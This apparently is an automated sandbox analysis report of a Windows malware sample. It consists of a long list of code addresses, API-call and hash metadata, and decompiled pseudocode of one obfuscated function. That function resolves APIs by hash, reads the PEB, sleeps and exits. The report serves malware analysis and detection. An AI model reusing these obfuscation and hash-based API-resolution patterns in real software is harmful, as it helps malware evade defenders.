                                                                                                                                                        0x00a16e2e
                                                                                                                                                        0x00a16e36
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16e3c
                                                                                                                                                        0x00a16e3f
                                                                                                                                                        0x00a16e45
                                                                                                                                                        0x00a16e48
                                                                                                                                                        0x00a16e4b
                                                                                                                                                        0x00a16e50
                                                                                                                                                        0x00a16e67
                                                                                                                                                        0x00a16e6f
                                                                                                                                                        0x00a16e74
                                                                                                                                                        0x00a16e7a
                                                                                                                                                        0x00a16e7d
                                                                                                                                                        0x00a16e85
                                                                                                                                                        0x00a16e90
                                                                                                                                                        0x00a16ea3
                                                                                                                                                        0x00a16ed1
                                                                                                                                                        0x00a16ed1
                                                                                                                                                        0x00a16ed9
                                                                                                                                                        0x00a16ee1
                                                                                                                                                        0x00a16ee4
                                                                                                                                                        0x00a16ef1
                                                                                                                                                        0x00a16f01
                                                                                                                                                        0x00a16f0f
                                                                                                                                                        0x00a16f14
                                                                                                                                                        0x00a16f27
                                                                                                                                                        0x00a16f2d
                                                                                                                                                        0x00a16f30
                                                                                                                                                        0x00a16f33
                                                                                                                                                        0x00a16f36
                                                                                                                                                        0x00a16f39
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16f39
                                                                                                                                                        0x00a16ea7
                                                                                                                                                        0x00a16ea7
                                                                                                                                                        0x00a16eb2
                                                                                                                                                        0x00a16ec0
                                                                                                                                                        0x00a16eca
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16ea7
                                                                                                                                                        0x00a16857
                                                                                                                                                        0x00a17334
                                                                                                                                                        0x00a17349
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17349
                                                                                                                                                        0x00a16863
                                                                                                                                                        0x00a1688c
                                                                                                                                                        0x00a1688c
                                                                                                                                                        0x00a16891
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16891
                                                                                                                                                        0x00a16865
                                                                                                                                                        0x00a1686d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16873
                                                                                                                                                        0x00a1687b
                                                                                                                                                        0x00a16881
                                                                                                                                                        0x00a16889
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16889
                                                                                                                                                        0x00a1686d
                                                                                                                                                        0x00a166c7
                                                                                                                                                        0x00a166d3
                                                                                                                                                        0x00a16c54
                                                                                                                                                        0x00a17726
                                                                                                                                                        0x00a17743
                                                                                                                                                        0x00a16c5a
                                                                                                                                                        0x00a16c60
                                                                                                                                                        0x00a17753
                                                                                                                                                        0x00a1775b
                                                                                                                                                        0x00a17765
                                                                                                                                                        0x00a1776a
                                                                                                                                                        0x00a16c66
                                                                                                                                                        0x00a16c66
                                                                                                                                                        0x00a16c6e
                                                                                                                                                        0x00a16c79
                                                                                                                                                        0x00a16c7e
                                                                                                                                                        0x00a16c8b
                                                                                                                                                        0x00a16c90
                                                                                                                                                        0x00a16c98
                                                                                                                                                        0x00a16ca0
                                                                                                                                                        0x00a16ca3
                                                                                                                                                        0x00a16cad
                                                                                                                                                        0x00a16cb3
                                                                                                                                                        0x00a16cb9
                                                                                                                                                        0x00a16cbe
                                                                                                                                                        0x00a16cc3
                                                                                                                                                        0x00a16cd2
                                                                                                                                                        0x00a16cd5
                                                                                                                                                        0x00a16cd8
                                                                                                                                                        0x00a16cdf
                                                                                                                                                        0x00a16cef
                                                                                                                                                        0x00a16cf7
                                                                                                                                                        0x00a16cfb
                                                                                                                                                        0x00a16d08
                                                                                                                                                        0x00a16d18
                                                                                                                                                        0x00a16d22
                                                                                                                                                        0x00a16d2a
                                                                                                                                                        0x00a16d31
                                                                                                                                                        0x00a16d37
                                                                                                                                                        0x00a16d37
                                                                                                                                                        0x00a16c6e
                                                                                                                                                        0x00a16c60
                                                                                                                                                        0x00a166d9
                                                                                                                                                        0x00a166df
                                                                                                                                                        0x00a17215
                                                                                                                                                        0x00a17224
                                                                                                                                                        0x00a1722c
                                                                                                                                                        0x00a17234
                                                                                                                                                        0x00a17240
                                                                                                                                                        0x00a17255
                                                                                                                                                        0x00a166e5
                                                                                                                                                        0x00a166eb
                                                                                                                                                        0x00a1725d
                                                                                                                                                        0x00a17262
                                                                                                                                                        0x00a166f1
                                                                                                                                                        0x00a166f1
                                                                                                                                                        0x00a166f9
                                                                                                                                                        0x00a166fb
                                                                                                                                                        0x00a16703
                                                                                                                                                        0x00a16703
                                                                                                                                                        0x00a166f9
                                                                                                                                                        0x00a166eb
                                                                                                                                                        0x00a166df
                                                                                                                                                        0x00a169b7
                                                                                                                                                        0x00a169bd
                                                                                                                                                        0x00a16fec
                                                                                                                                                        0x00a179de
                                                                                                                                                        0x00a179f0
                                                                                                                                                        0x00a17a0b
                                                                                                                                                        0x00a16ff2
                                                                                                                                                        0x00a16ff2
                                                                                                                                                        0x00a16ffa
                                                                                                                                                        0x00a17000
                                                                                                                                                        0x00a1700b
                                                                                                                                                        0x00a1700b
                                                                                                                                                        0x00a16ffa
                                                                                                                                                        0x00a169c3
                                                                                                                                                        0x00a169c9
                                                                                                                                                        0x00a1744a
                                                                                                                                                        0x00a17452
                                                                                                                                                        0x00a17467
                                                                                                                                                        0x00a169cf
                                                                                                                                                        0x00a169d5
                                                                                                                                                        0x00a17477
                                                                                                                                                        0x00a17484
                                                                                                                                                        0x00a17491
                                                                                                                                                        0x00a17499
                                                                                                                                                        0x00a174a1
                                                                                                                                                        0x00a174a9
                                                                                                                                                        0x00a174b1
                                                                                                                                                        0x00a174c2
                                                                                                                                                        0x00a169db
                                                                                                                                                        0x00a169db
                                                                                                                                                        0x00a169e3
                                                                                                                                                        0x00a169e9
                                                                                                                                                        0x00a169e9
                                                                                                                                                        0x00a169e3
                                                                                                                                                        0x00a169d5
                                                                                                                                                        0x00a169c9
                                                                                                                                                        0x00a169bd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1670a
                                                                                                                                                        0x00a16710
                                                                                                                                                        0x00a167f7
                                                                                                                                                        0x00a1695f
                                                                                                                                                        0x00a16bfe
                                                                                                                                                        0x00a17196
                                                                                                                                                        0x00a17b18
                                                                                                                                                        0x00a17b1e
                                                                                                                                                        0x00a1719c
                                                                                                                                                        0x00a1719c
                                                                                                                                                        0x00a171a4
                                                                                                                                                        0x00a171aa
                                                                                                                                                        0x00a171cc
                                                                                                                                                        0x00a171d2
                                                                                                                                                        0x00a171dc
                                                                                                                                                        0x00a171ec
                                                                                                                                                        0x00a171f4
                                                                                                                                                        0x00a17206
                                                                                                                                                        0x00a17206
                                                                                                                                                        0x00a171a4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17196
                                                                                                                                                        0x00a16c0a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16c10
                                                                                                                                                        0x00a16c16
                                                                                                                                                        0x00a176ef
                                                                                                                                                        0x00a176f3
                                                                                                                                                        0x00a176fb
                                                                                                                                                        0x00a17700
                                                                                                                                                        0x00a1770d
                                                                                                                                                        0x00a17714
                                                                                                                                                        0x00a16c1c
                                                                                                                                                        0x00a16c1c
                                                                                                                                                        0x00a16c24
                                                                                                                                                        0x00a16c31
                                                                                                                                                        0x00a16c46
                                                                                                                                                        0x00a16c46
                                                                                                                                                        0x00a16c24
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16c16
                                                                                                                                                        0x00a16c0a
                                                                                                                                                        0x00a1696b
                                                                                                                                                        0x00a16fcd
                                                                                                                                                        0x00a179ce
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a179ce
                                                                                                                                                        0x00a16fd3
                                                                                                                                                        0x00a16fdb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17a8f
                                                                                                                                                        0x00a17a8f
                                                                                                                                                        0x00a17a92
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17a92
                                                                                                                                                        0x00a16977
                                                                                                                                                        0x00a17b28
                                                                                                                                                        0x00a17b42
                                                                                                                                                        0x00a1697d
                                                                                                                                                        0x00a1697d
                                                                                                                                                        0x00a16985
                                                                                                                                                        0x00a1698b
                                                                                                                                                        0x00a16990
                                                                                                                                                        0x00a1699b
                                                                                                                                                        0x00a169a5
                                                                                                                                                        0x00a169ad
                                                                                                                                                        0x00a169ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16985
                                                                                                                                                        0x00a16977
                                                                                                                                                        0x00a16803
                                                                                                                                                        0x00a16a9c
                                                                                                                                                        0x00a170b6
                                                                                                                                                        0x00a17a69
                                                                                                                                                        0x00a17a75
                                                                                                                                                        0x00a17a7a
                                                                                                                                                        0x00a17a80
                                                                                                                                                        0x00a17a86
                                                                                                                                                        0x00a17a8d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17a8d
                                                                                                                                                        0x00a170bc
                                                                                                                                                        0x00a170c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a170ca
                                                                                                                                                        0x00a170d2
                                                                                                                                                        0x00a170d2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a170d2
                                                                                                                                                        0x00a16aa8
                                                                                                                                                        0x00a175ff
                                                                                                                                                        0x00a17603
                                                                                                                                                        0x00a1760f
                                                                                                                                                        0x00a17624
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17624
                                                                                                                                                        0x00a16ab4
                                                                                                                                                        0x00a1762c
                                                                                                                                                        0x00a17631
                                                                                                                                                        0x00a17636
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17636
                                                                                                                                                        0x00a16aba
                                                                                                                                                        0x00a16ac2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16ac8
                                                                                                                                                        0x00a16ad1
                                                                                                                                                        0x00a16ad9
                                                                                                                                                        0x00a16adb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16adb
                                                                                                                                                        0x00a16ac2
                                                                                                                                                        0x00a1680f
                                                                                                                                                        0x00a16dec
                                                                                                                                                        0x00a17894
                                                                                                                                                        0x00a178a1
                                                                                                                                                        0x00a178a6
                                                                                                                                                        0x00a178ae
                                                                                                                                                        0x00a178bb
                                                                                                                                                        0x00a178c3
                                                                                                                                                        0x00a16df2
                                                                                                                                                        0x00a16df8
                                                                                                                                                        0x00a178d5
                                                                                                                                                        0x00a178ea
                                                                                                                                                        0x00a178f2
                                                                                                                                                        0x00a17907
                                                                                                                                                        0x00a16dfe
                                                                                                                                                        0x00a16dfe
                                                                                                                                                        0x00a16e06
                                                                                                                                                        0x00a16e0c
                                                                                                                                                        0x00a16e0c
                                                                                                                                                        0x00a16e06
                                                                                                                                                        0x00a16df8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16dec
                                                                                                                                                        0x00a1681b
                                                                                                                                                        0x00a1732c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1732c
                                                                                                                                                        0x00a16827
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16829
                                                                                                                                                        0x00a16831
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16837
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16837
                                                                                                                                                        0x00a16831
                                                                                                                                                        0x00a1671c
                                                                                                                                                        0x00a1689f
                                                                                                                                                        0x00a16b5e
                                                                                                                                                        0x00a1711e
                                                                                                                                                        0x00a17aa4
                                                                                                                                                        0x00a17aaa
                                                                                                                                                        0x00a17ab2
                                                                                                                                                        0x00a17ac5
                                                                                                                                                        0x00a17aca
                                                                                                                                                        0x00a17ad0
                                                                                                                                                        0x00a17ad6
                                                                                                                                                        0x00a17add
                                                                                                                                                        0x00a17adf
                                                                                                                                                        0x00a17ae9
                                                                                                                                                        0x00a17124
                                                                                                                                                        0x00a17124
                                                                                                                                                        0x00a1712c
                                                                                                                                                        0x00a17132
                                                                                                                                                        0x00a17137
                                                                                                                                                        0x00a17137
                                                                                                                                                        0x00a1712c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1711e
                                                                                                                                                        0x00a16b6a
                                                                                                                                                        0x00a1765b
                                                                                                                                                        0x00a17667
                                                                                                                                                        0x00a1766f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16b70
                                                                                                                                                        0x00a16b76
                                                                                                                                                        0x00a1767b
                                                                                                                                                        0x00a16b7c
                                                                                                                                                        0x00a16b7c
                                                                                                                                                        0x00a16b84
                                                                                                                                                        0x00a16b8f
                                                                                                                                                        0x00a16b94
                                                                                                                                                        0x00a16b99
                                                                                                                                                        0x00a16b9c
                                                                                                                                                        0x00a16ba1
                                                                                                                                                        0x00a16ba1
                                                                                                                                                        0x00a16b84
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16b76
                                                                                                                                                        0x00a16b6a
                                                                                                                                                        0x00a168ab
                                                                                                                                                        0x00a16f41
                                                                                                                                                        0x00a16f4a
                                                                                                                                                        0x00a16f56
                                                                                                                                                        0x00a17940
                                                                                                                                                        0x00a1794f
                                                                                                                                                        0x00a17951
                                                                                                                                                        0x00a16f5c
                                                                                                                                                        0x00a16f5c
                                                                                                                                                        0x00a16f64
                                                                                                                                                        0x00a16f71
                                                                                                                                                        0x00a16f75
                                                                                                                                                        0x00a16f8d
                                                                                                                                                        0x00a16f8d
                                                                                                                                                        0x00a16f64
                                                                                                                                                        0x00a16f56
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a16f4a
                                                                                                                                                        0x00a168b7
                                                                                                                                                        0x00a17358
                                                                                                                                                        0x00a17364
                                                                                                                                                        0x00a1736c
                                                                                                                                                        0x00a17384
                                                                                                                                                        0x00a1738b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a1738b
                                                                                                                                                        0x00a168c3
                                                                                                                                                        0x00a1739c
                                                                                                                                                        0x00a173ac
                                                                                                                                                        0x00a173bc
                                                                                                                                                        0x00a173bf
                                                                                                                                                        0x00a173c7
                                                                                                                                                        0x00a173c9
                                                                                                                                                        0x00a173d1
                                                                                                                                                        0x00a173d9
                                                                                                                                                        0x00a173ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a173ea
                                                                                                                                                        0x00a168c9
                                                                                                                                                        0x00a168d1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a168d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a168d7
                                                                                                                                                        0x00a168d1
                                                                                                                                                        0x00a16728
                                                                                                                                                        0x00a169fb
                                                                                                                                                        0x00a1701b
                                                                                                                                                        0x00a17a13
                                                                                                                                                        0x00a17a1b
                                                                                                                                                        0x00a17a20
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00a17a20
                                                                                                                                                        0x00a17021
                                                                                                                                                        0x00a17029
                                                                                                                                                        0x00a17037
                                                                                                                                                        0x00a1703f
                                                                                                                                                        0x00a17049
                                                                                                                                                        0x00a17057
                                                                                                                                                        0x00a1706b
                                                                                                                                                        0x00a1706b
                                                                                                                                                        0x00a16a01
                                                                                                                                                        0x00a16a07
                                                                                                                                                        0x00a174d1
                                                                                                                                                        0x00a174e9
                                                                                                                                                        0x00a174f5
                                                                                                                                                        0x00a174fd
                                                                                                                                                        0x00a17509
                                                                                                                                                        0x00a1751e
                                                                                                                                                        0x00a17523
                                                                                                                                                        0x00a16a0d
                                                                                                                                                        0x00a16a13
                                                                                                                                                        0x00a1752c
                                                                                                                                                        0x00a17532
                                                                                                                                                        0x00a17542
                                                                                                                                                        0x00a17550
                                                                                                                                                        0x00a17567
                                                                                                                                                        0x00a1756f
                                                                                                                                                        0x00a16a19
                                                                                                                                                        0x00a16a19
                                                                                                                                                        0x00a16a21
                                                                                                                                                        0x00a16a3a
                                                                                                                                                        0x00a16a3a
                                                                                                                                                        0x00a16a21
                                                                                                                                                        0x00a16a13
                                                                                                                                                        0x00a16a07
                                                                                                                                                        0x00a1672e
                                                                                                                                                        0x00a16734
                                                                                                                                                        0x00a16d47
                                                                                                                                                        0x00a17780
                                                                                                                                                        0x00a17784
                                                                                                                                                        0x00a1778c
                                                                                                                                                        0x00a17791
                                                                                                                                                        0x00a1779e
                                                                                                                                                        0x00a177b0
                                                                                                                                                        0x00a177c2
                                                                                                                                                        0x00a177d8
                                                                                                                                                        0x00a177e8
                                                                                                                                                        0x00a177fa
                                                                                                                                                        0x00a17806
                                                                                                                                                        0x00a1780a
                                                                                                                                                        0x00a17816
                                                                                                                                                        0x00a1781d
                                                                                                                                                        0x00a16d4d
                                                                                                                                                        0x00a16d53
                                                                                                                                                        0x00a1782d
                                                                                                                                                        0x00a17838
                                                                                                                                                        0x00a1783c
                                                                                                                                                        0x00a16d59
                                                                                                                                                        0x00a16d59
                                                                                                                                                        0x00a16d61
                                                                                                                                                        0x00a16d67
                                                                                                                                                        0x00a16d67
                                                                                                                                                        0x00a16d61
                                                                                                                                                        0x00a16d53
                                                                                                                                                        0x00a1673a
                                                                                                                                                        0x00a16740
                                                                                                                                                        0x00a1727a
                                                                                                                                                        0x00a17282
                                                                                                                                                        0x00a17297
                                                                                                                                                        0x00a16746
                                                                                                                                                        0x00a1674c
                                                                                                                                                        0x00a172a6
                                                                                                                                                        0x00a172aa
                                                                                                                                                        0x00a172c2
                                                                                                                                                        0x00a16752
                                                                                                                                                        0x00a16752
                                                                                                                                                        0x00a1675a
                                                                                                                                                        0x00a16760
                                                                                                                                                        0x00a16768
                                                                                                                                                        0x00a1676d
                                                                                                                                                        0x00a16770
                                                                                                                                                        0x00a16775
                                                                                                                                                        0x00a16775
                                                                                                                                                        0x00a1675a
                                                                                                                                                        0x00a1674c
                                                                                                                                                        0x00a16740
                                                                                                                                                        0x00a16734
                                                                                                                                                        0x00a16728

                                                                                                                                                        APIs
                                                                                                                                                        • SleepEx.KERNEL32 ref: 00A17A8D
                                                                                                                                                          • Part of subcall function 00A1CDB9: RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00A20A77), ref: 00A1CE20
                                                                                                                                                        • WSAStartup.WS2_32 ref: 00A17416
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000019.00000002.634304009.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                        • Associated: 00000019.00000002.634295050.0000000000A10000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634331329.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634341347.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeapSleepStartup
                                                                                                                                                        • String ID: >en$?en$?en$[O$\O$\O$a'/$b'/$b'/$b'/
                                                                                                                                                        • API String ID: 1599684237-3790037689
                                                                                                                                                        • Opcode ID: 992b3a2e51049f5b4f1ee8d81303aa8e031c5bb5490aaf88099e212acc2056f3
                                                                                                                                                        • Instruction ID: 3ba9c8a1c4b321efd133edaae4703d2e3f4e80e4d415330dea23d3dc0a291be7
                                                                                                                                                        • Opcode Fuzzy Hash: 992b3a2e51049f5b4f1ee8d81303aa8e031c5bb5490aaf88099e212acc2056f3
                                                                                                                                                        • Instruction Fuzzy Hash: 7BA241762197C48ACB788F19E4943EE77A1F7C8B44F64401ADA9EC7B64DB39C880DB41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00A202A4, Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 543COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E00A202A4(void* __ebx, void* __ecx, void* __edx, signed int __esi, signed long long __rax, signed long long __rcx, char* __r8, void* __r9, void* __r11) {
				signed long long _v72;
				void* _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed long long _v104;
				void* _v112;
				signed long long _v120;
				intOrPtr _v124;
				signed long long _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _t111;
				void* _t115;
				void* _t197;
				signed int _t201;
				void* _t258;
				void* _t268;
				signed int _t269;
				signed int _t271;
				signed long long _t283;
				long long* _t284;
				long long* _t285;
				char* _t290;
				signed long long _t292;
				void* _t305;
				void* _t306;

				_t306 = __r11;
				_t305 = __r9;
				_t304 = __r8;
				_t292 = __rcx;
				_t283 = __rax;
				_t269 = __esi;
				_t197 = __ebx;
				_t290 = __r8;
				_t271 =  ==  ? 0xf29a3544 : 0x9fd7756b;
				r14d = 0x701b759;
				_t258 =  ==  ? r14d : 0xd9502225;
				_v84 = 0xd9502225;
				_t200 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_v88 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_t109 =  ==  ? r14d : 0xa912c783;
				_v92 =  ==  ? r14d : 0xa912c783;
				r15d = 0xda537fa7;
				r15d =  ==  ? 0x170b999c : r15d;
				_t111 = 0xca288c41;
				_t268 = 0x79849ae;
				while(1) {
					L1:
					_v120 = _t292;
					while(1) {
						L2:
						_t201 = _t111;
						if(_t111 > 0xf29a3543) {
							goto L10;
						}
						L3:
						if(_t201 <= 0xb0b3b625) {
							__eflags = _t201 - 0x93c76e2c;
							if(_t201 > 0x93c76e2c) {
								__eflags = _t201 - 0x9fd7756a;
								if(_t201 > 0x9fd7756a) {
									__eflags = _t201 - 0x9fd7756b;
									if(_t201 == 0x9fd7756b) {
										E00A1CDB9(0x30, _t283);
										_v104 = _t283;
										_t284 = _v104;
										_v112 = _t284;
										r8d = 0x18d1ea71;
										r9d = 0x2b;
										E00A1FAD7(1, _t269, _t284, _t292);
										 *_t284();
										_t285 =  *[gs:0x60];
										r8d = 0x27c2b783;
										r9d = 0xd;
										E00A1FAD7(1, _t269, _t285, _t292);
										r8d = 0x30;
										_t299 = _v112;
										r14d = 0x701b759;
										 *_t285();
										_t292 = 0xa202a4;
										_t283 =  *((intOrPtr*)(_v112 + 0x18)) + 0xa202a4;
										_v72 = _t283;
										__eflags =  *((intOrPtr*)(_t285 + 0x10)) - 0xa202a4;
										_t268 = 0x79849ae;
										_t111 =  >  ? 0xb0b3b626 : 0x2f0fb31e;
									} else {
										__eflags = _t201 - 0xa1a997a0;
										if(_t201 == 0xa1a997a0) {
											_v144 = r13d;
											__eflags = _v144 - 0x1520f;
											_t111 =  <  ? 0xea392f63 : 0x859994e5;
										} else {
											_t111 = _t201;
											__eflags = _t201 - 0xa912c783;
											if(_t201 == 0xa912c783) {
												__eflags =  *_t290;
												_t111 =  ==  ? r14d : 0x170b999c;
											}
										}
									}
									while(1) {
										L2:
										_t201 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
								}
								__eflags = _t201 - 0x93c76e2d;
								if(_t201 == 0x93c76e2d) {
									_t292 = _v136;
									E00A1A4E4(_t292);
									L107:
									_t111 = 0xb42b969a;
									while(1) {
										L2:
										_t201 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
									goto L10;
								}
								__eflags = _t201 - 0x945c137a;
								if(_t201 == 0x945c137a) {
									goto L107;
								} else {
									_t111 = _t201;
									__eflags = _t201 - 0x9a2c0e1f;
									if(_t201 == 0x9a2c0e1f) {
										r13d = _v144;
										r13d = r13d + 3;
										_t111 = 0xa1a997a0;
									}
									continue;
								}
							}
							__eflags = _t201 - 0x859994e4;
							if(_t201 > 0x859994e4) {
								__eflags = _t201 - 0x859994e5;
								if(_t201 == 0x859994e5) {
									__eflags = _v152 + _v164 + _v156 - 0xf302e;
									_t111 =  ==  ? 0x6dc18416 : 0x2e98952d;
									continue;
								}
								__eflags = _t201 - 0x91685319;
								if(_t201 == 0x91685319) {
									_t111 = 0xbe5a0f3f;
									continue;
								}
								_t111 = _t201;
								__eflags = _t201 - 0x91ac664b;
								if(_t201 != 0x91ac664b) {
									continue;
								}
								_t292 = _v136;
								__eflags = E00A1A8E0(_t292);
								_t115 = 0x51fb7187;
								L112:
								_t111 =  !=  ? 0xb42b969a : _t115;
								continue;
							}
							__eflags = _t201 - 0x834d46ed;
							if(_t201 == 0x834d46ed) {
								_v152 = (_v156 + 0xfffffffc) * _v164 - _v144 * _v140;
								_v164 = _t292 + _t283 * 2 - _v140 + 0xfffffc19;
								_t262 =  ~(_v152 + _v164) * _v156;
								_v156 = _t292 + _t292 * 2 + _t283 + _t292 * 8 +  ~(_v152 + _v164) * _v156;
								r12d = _v140;
								r12d = r12d + 5;
								_t111 = 0x34527dc1;
								continue;
							}
							__eflags = _t201 - 0x843901b2;
							if(_t201 == 0x843901b2) {
								__eflags = _v148 - 4;
								_t111 =  <  ? 0xe4701c02 : 0x13aae927;
								continue;
							}
							_t111 = _t201;
							__eflags = _t201 - 0x854a966f;
							if(_t201 == 0x854a966f) {
								return _t111;
							} else {
								continue;
							}
						}
						if(_t201 > 0xca288c40) {
							__eflags = _t201 - 0xe4701c01;
							if(_t201 > 0xe4701c01) {
								__eflags = _t201 - 0xe4701c02;
								if(_t201 == 0xe4701c02) {
									__eflags = _v148 - 2;
									_t111 =  <  ? _t268 : 0x91685319;
									continue;
								}
								__eflags = _t201 - 0xea392f63;
								if(_t201 == 0xea392f63) {
									_t111 = 0x34527dc1;
									r12d = 0;
									continue;
								}
								_t111 = _t201;
								__eflags = _t201 - 0xeb6755e2;
								if(_t201 != 0xeb6755e2) {
									continue;
								}
								__eflags = _v148 - 4;
								L96:
								_t111 =  ==  ? _t268 : 0x91685319;
							} else {
								_t111 = r15d;
								__eflags = _t201 - 0xca288c41;
								if(_t201 != 0xca288c41) {
									__eflags = _t201 - 0xd9502225;
									if(_t201 == 0xd9502225) {
										 *_t290 = 0;
										_t111 = 0x701b759;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0xda537fa7;
										if(_t201 == 0xda537fa7) {
											_t111 = _v92;
										}
									}
								}
							}
							continue;
						}
						if(_t201 > 0xc10a918e) {
							__eflags = _t201 - 0xc10a918f;
							if(_t201 == 0xc10a918f) {
								__eflags = _v148 - 8;
								goto L96;
							}
							__eflags = _t201 - 0xc7704248;
							if(_t201 == 0xc7704248) {
								__eflags = _v160 - 8;
								_t111 =  ==  ? 0x93c76e2d : 0x945c137a;
							} else {
								_t111 = _t201;
								__eflags = _t201 - 0xc88989fd;
								if(_t201 == 0xc88989fd) {
									_t283 = _v80;
									_v160 =  *_t283;
									_t111 = 0x7c8c10e9;
								}
							}
							continue;
						}
						if(_t201 <= 0xbe5a0f3e) {
							__eflags = _t201 - 0xb0b3b626;
							if(_t201 != 0xb0b3b626) {
								_t111 = _t201;
								__eflags = _t201 - 0xb42b969a;
								if(_t201 != 0xb42b969a) {
									continue;
								}
								E00A13998(_v136);
								E00A20C45();
								__eflags = 0;
								ExitProcess(??);
							}
							_v120 = _t283;
							r8d = 0x30;
							E00A1C8BC(0, _t283, _v104, _t304, _t306);
							_t262 = 1;
							r8d = 0x27c2b783;
							r9d = 0xd;
							E00A1FAD7(1, _t269, _t283, _v104);
							r8d = 0x30;
							_t292 = 0xa202a4;
							_t299 = _v112;
							_t268 = 0x79849ae;
							 *_t283();
							_t283 = _v112;
							__eflags =  *((intOrPtr*)(_t283 + 0x28)) - 0x1000000;
							_t111 =  ==  ? 0x48479475 : 0x27daf151;
						} else {
							if(_t201 == 0xbe5a0f3f) {
								_t111 = 0x63da8ac0;
								_v124 = 0x3e8;
							} else {
								_t111 = _t201;
								if(_t201 == 0xbf82bb62) {
									_t111 =  ==  ? 0x91ac664b : 0x945c137a;
								}
							}
						}
						continue;
						L10:
						__eflags = _t201 - 0x2e98952c;
						if(_t201 > 0x2e98952c) {
							__eflags = _t201 - 0x5c545ed3;
							if(_t201 > 0x5c545ed3) {
								__eflags = _t201 - 0x7c8c10e8;
								if(_t201 > 0x7c8c10e8) {
									__eflags = _t201 - 0x7c8c10e9;
									if(_t201 == 0x7c8c10e9) {
										__eflags = _v160 - 2;
										_t111 =  <  ? 0x537690ef : 0xe1b9813;
										continue;
									}
									__eflags = _t201 - 0x7d4a3cd4;
									if(_t201 == 0x7d4a3cd4) {
										_t292 = _v136;
										__eflags = E00A1A504(_t262, _t268, _t271, _t283, _t292, _t305);
										_t115 = 0x91ac664b;
										goto L112;
									}
									_t111 = _t201;
									__eflags = _t201 - 0x7da7801f;
									if(_t201 == 0x7da7801f) {
										__eflags = _v160;
										_t111 =  ==  ? 0x51fb7187 : 0x945c137a;
									}
								} else {
									__eflags = _t201 - 0x5c545ed4;
									if(_t201 == 0x5c545ed4) {
										_t262 = 1;
										r8d = 0x510b3a3e;
										r9d = 0x5c;
										E00A1FAD7(1, _t269, _t283, _t292);
										 *_t283();
										_t111 = 0xc88989fd;
									} else {
										__eflags = _t201 - 0x63da8ac0;
										if(_t201 == 0x63da8ac0) {
											r8d = 0x9d3c7b7a;
											r9d = 0xb2;
											E00A1FAD7(1, _t269, _t283, _t292);
											SleepEx(??, ??); // executed
											_t262 = 0x20;
											E00A19F06(0x20, _t269, _v136, _t299, _t304, _t306);
											_t299 = _v136 + _t283;
											_t292 = _v136 + _t283;
											__eflags = E00A13A22(_t283, _t292, _v136 + _t283);
											_t111 =  !=  ? 0x5c545ed4 : 0xc88989fd;
										} else {
											_t111 = _t201;
											__eflags = _t201 - 0x6dc18416;
											if(_t201 == 0x6dc18416) {
												_v152 = _v152 + _v164 - (_v156 << 4);
												_v164 = _v156 + _t292 + _t292 * 2 + 0xffffffb3;
												_t111 = 0x2e98952d;
											}
										}
									}
								}
								continue;
							}
							__eflags = _t201 - 0x48479474;
							if(_t201 > 0x48479474) {
								__eflags = _t201 - 0x48479475;
								if(_t201 == 0x48479475) {
									_t111 = 0x27daf151;
									while(1) {
										L1:
										_v120 = _t292;
										goto L2;
									}
								}
